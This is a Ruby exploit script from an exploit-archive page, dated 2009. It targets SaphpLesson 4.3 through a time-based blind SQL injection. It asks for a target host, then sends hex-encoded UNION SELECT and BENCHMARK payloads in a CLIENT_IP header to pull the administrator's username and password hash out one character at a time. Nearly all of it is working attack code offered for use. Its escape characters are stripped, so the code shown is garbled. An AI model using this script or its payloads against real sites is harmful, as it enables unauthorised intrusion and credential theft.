[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Saphplesson 4.3 Remote Blind SQL Injection Exploit
# Published : 2009-09-16
# Author : Jafer Al Zidjali
# Previous Title : MicroCMS 3.5 (SQL/LFI) Multiple Remote Vulnerabilities
# Next Title : Elite Gaming Ladders 3.2 (platform) SQL Injection Vulnerability
#!/usr/bin/ruby
#=============================================#
# SaphpLesson v4.3 Exploit #
# Blind SQL Injection Vulnerability #
#---------------------------------------------#
# Date: 21-08-2009 #
# Discovered & written by: Jafer Al Zidjali #
# Email: jafer[at]scorpionds.com #
# Website: www.scorpionds.com #
#---------------------------------------------#
# Notes: #
# 1. Author has been notified #
# 2. A public patch has been released #
#=============================================#
require "net/http"
require "base64"
intro=[
"+=============================================+",
"+ SaphpLesson v4.3 Exploit +",
"+ Blind SQL Injection Vulnerability +",
"+ Discovered & written by: Jafer Al Zidjali +",
"+ Email: jafer[at]scorpionds.com +",
"+ Website: www.scorpionds.com +",
"+=============================================+"
]
def print_intro text
w="|"
text.each do |str|
str.scan(/./) do |c|
STDOUT.flush
if w=="|"
print "b"+c +w
w="/"
elsif w=="/"
print "b"+c +w
w="-"
elsif w=="-"
print "b"+c +w
w="\"
else
print "b"+c +w
w="|"
end
sleep 0.04
end
print "b "
puts ""
end
end
print_intro intro
puts "nEnter host name (e.g. example.com):"
host=gets.chomp
puts "nEnter script path (e.g. /saphplesson/):"
path=gets.chomp
puts "nGetting average response time..."
avgTime=Array.new(5)
5.times do |c|
s=Time.now
http = Net::HTTP.new(host, 80)
resp= http.get(path)
w=resp.body
avgTime[c]=Time.now-s
puts avgTime[c]
end
sum=0
5.times {|c| sum+=avgTime[c]}
avg=sum/5.0
puts "Average response time is: #{avg*3.0}"
puts "nTesting delayed response time..."
delTime=Array.new(5)
5.times do |t|
delay=1000000*((t+1)*10)
header={
"CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
"x20x49x46x28x31x3dx31x2cx42x45x4ex43x48x4d"+
"x41x52x4bx28#{delay}x2cx63x68x61x72x28x63x68"+
"x61x72x28x32x29x29x29x2cx33x34x33x34x29x20x23x20"
}
s=Time.now
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
w=resp.body
s=Time.now-s
delTime[t]=delay
puts "["+(t+1).to_s+"] #{s}"
end
puts "nChoose a delyed response time (it should be > average response time):"
sel=gets.chomp
print "nGetting username length"
ulen=0
20.times do |z|
header={
"CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
"x20x49x46x28x6cx65x6ex67x74x68x28x28x73x65x6cx65x63x74"+
"x20x4dx6fx64x4ex61x6dx65x20x66x72x6fx6dx20x6dx6fx64x72"+
"x65x74x6fx72x20x77x68x65x72x65x20x4dx6fx64x49x44x3dx31"+
"x29x29x3d#{z+1}x2cx42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
"x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33x34x33x34x29x20x23x20"
}
s=Time.now
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
w=resp.body
s=Time.now-s
print "."
if (s>(avg*3.0))
ulen=z+1
break;
end
STDOUT.flush
end
puts "nnUsername length: "+ ulen.to_s
puts "nnUsername: "
chars="abcdefghijklmnopqrstuvwxyz0123456789"
ulen.times do |z|
chars.scan(/./) do |c|
header={
"CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43"+
"x54x20x49x46x28x73x75x62x73x74x72x69x6ex67x28x28x73"+
"x65x6cx65x63x74x20x4dx6fx64x4ex61x6dx65x20x66x72x6f"+
"x6dx20x6dx6fx64x72x65x74x6fx72x20x77x68x65x72x65x20"+
"x4dx6fx64x49x44x3dx31x29x2c#{z+1}x2cx31x29x3dx27#{c}x27"+
"x2cx42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
"x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33"+
"x34x33x34x29x20x23x20"
}
s=Time.now
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
w=resp.body
s=Time.now-s
print c
if (s>(avg*3.0))
break;
end
print "b"
STDOUT.flush
end
end
puts "nnPassword hash: "
chars="0123456789abcdef"
32.times do |z|
chars.scan(/./) do |c|
header={
"CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
"x20x49x46x28x73x75x62x73x74x72x69x6ex67x28x28x73x65x6c"+
"x65x63x74x20x4dx6fx64x50x61x73x73x77x6fx72x64x20x66x72"+
"x6fx6dx20x6dx6fx64x72x65x74x6fx72x20x77x68x65x72x65x20"+
"x4dx6fx64x49x44x3dx31x29x2c#{z+1}x2cx31x29x3dx27#{c}x27x2c"+
"x42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
"x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33x34"+
"x33x34x29x20x23x20"
}
s=Time.now
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
w=resp.body
s=Time.now-s
print c
if (s>(avg*3.0))
break;
end
print "b"
STDOUT.flush
end
end
# www.Syue.com [2009-09-16]